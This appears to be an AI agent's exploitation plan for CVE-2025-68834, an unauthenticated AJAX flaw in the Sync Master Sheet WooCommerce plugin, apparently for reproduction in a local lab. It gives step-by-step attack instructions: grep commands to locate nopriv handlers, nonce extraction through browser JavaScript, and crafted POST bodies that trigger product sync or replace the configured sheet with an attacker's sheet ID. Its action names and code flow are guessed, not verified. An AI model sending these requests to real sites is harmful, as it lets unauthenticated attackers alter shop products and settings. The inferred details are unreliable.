Exploitation Research Plan: CVE-2025-68834 (Sync Master Sheet)

1. Vulnerability Summary

The Sync Master Sheet – Product Sync with Google Sheet for WooCommerce plugin (<= 1.1.3) contains a missing authorization vulnerability. Specifically, it registers one or more AJAX handlers using the wp_ajax_nopriv_ hook, which allows unauthenticated access. These handlers perform sensitive actions (such as triggering product synchronization or potentially updating plugin settings) without verifying the user's capabilities via current_user_can() or adequately validating a nonce for session-bound security.

2. Attack Vector Analysis

• Endpoint: http://<target>/wp-admin/admin-ajax.php
• Vulnerable Action: Likely psms_sync_products or psms_save_settings (inferred from plugin functionality).
• HTTP Method: POST
• Payload Parameters:
  • action: The vulnerable AJAX action (e.g., psms_sync_products).
  • nonce: (If required) A token retrieved from the frontend.
  • Potential data parameters: sheet_id, sync_type, or configuration keys.
• Preconditions: The plugin must be active. Some sync actions may require a valid Google Sheet ID to be configured, or the attacker may provide one in the request if the handler allows settings updates.

3. Code Flow (Inferred)

1. Entry Point: The plugin registers AJAX hooks in the constructor of its main class or an admin class (e.g., includes/class-product-sync-master-sheet-admin.php or admin/class-psms-admin.php).
   • Hook: add_action( 'wp_ajax_nopriv_psms_sync_products', array( $this, 'psms_sync_products_callback' ) );
2. Callback Execution: The psms_sync_products_callback function is invoked.
3. Missing Check: The function fails to call if ( ! current_user_can( 'manage_options' ) ) { wp_die(); }.
4. Action Sink: The function proceeds to trigger Psms_Sync_Handler::start_sync() or similar logic, leading to unauthorized modification of the site's product database based on remote Google Sheet data.

4. Nonce Acquisition Strategy

If the handler uses check_ajax_referer or wp_verify_nonce, the nonce is likely exposed via wp_localize_script.

1. Identify Script Localization: Search the codebase for wp_localize_script. Look for a variable name like psms_ajax_obj or psms_vars.
2. Determine Page Trigger: Identify which page/shortcode enqueues this script. It is likely the main WooCommerce shop page or a specific product page.
3. Creation of Test Page:

   # Check for shortcodes
   grep -r "add_shortcode" .
   # If a shortcode like [psms_sync_button] exists:
   wp post create --post_type=page --post_status=publish --post_title="Sync Test" --post_content='[psms_sync_button]'
   

4. Extraction:
   • Navigate to the page using browser_navigate.
   • Execute: browser_eval("window.psms_ajax_obj?.nonce") (Verify variable name in source).

5. Exploitation Strategy

Step 1: Discover the exact AJAX action

Since source files are not provided, the agent must first identify the vulnerable hook.

grep -rn "wp_ajax_nopriv_" wp-content/plugins/product-sync-master-sheet/

Step 2: Analyze the callback

Examine the callback function for the identified action. Check for current_user_can and identify required parameters.

# Example if the action is psms_sync_products
grep -r "function psms_sync_products" wp-content/plugins/product-sync-master-sheet/

Step 3: Craft the Exploit Request

Assuming the action is psms_sync_products and it triggers a sync:

HTTP Request:

• URL: http://localhost:8080/wp-admin/admin-ajax.php
• Method: POST
• Headers: Content-Type: application/x-www-form-urlencoded
• Body: action=psms_sync_products&nonce=<EXTRACTED_NONCE>&any_other_param=value

Step 4: Unauthorized Settings Modification (If applicable)

If a handler like psms_save_settings is exposed:
Body: action=psms_save_settings&nonce=<NONCE>&psms_google_sheet_id=MALICIOUS_SHEET_ID

6. Test Data Setup

1. Install Plugin: Ensure product-sync-master-sheet version 1.1.3 is installed.
2. WooCommerce Setup: Ensure WooCommerce is installed and active, as the plugin depends on it.
3. Configuration: (Optional) Add a dummy Google Sheet ID in the plugin settings via WP-CLI to simulate a configured environment:

   wp option update psms_settings '{"sheet_id":"1A2B3C4D5E", "sync_enabled":"yes"}' --format=json
   

7. Expected Results

• Success Response: The server returns a 200 OK with a JSON body such as {"success":true, "data":"Sync started"} or {"status":"updated"}.
• Action Taken: The plugin initiates a network request to Google APIs (observable in logs) or modifies WooCommerce product data. If settings are the target, the psms_settings option in the database will be changed.

8. Verification Steps

After sending the HTTP request, use WP-CLI to verify the state:

1. Check Options:

   wp option get psms_settings
   

2. Check Sync Logs (if any):

   wp post list --post_type=product --orderby=post_modified --posts_per_page=5
   

   (Verify if products were updated at the timestamp of the exploit).

9. Alternative Approaches

If no wp_ajax_nopriv_ hooks are found, check for:

• REST API Routes: grep -r "register_rest_route" and look for routes missing the permission_callback or using __return_true.
• admin_init Hooks: Search for code running on admin_init without is_admin() or capability checks. admin-ajax.php triggers admin_init even for unauthenticated users.
• Generic Nonces: If check_ajax_referer( 'psms_nonce', ... ) is used, check if the psms_nonce is leaked on the frontend for all visitors.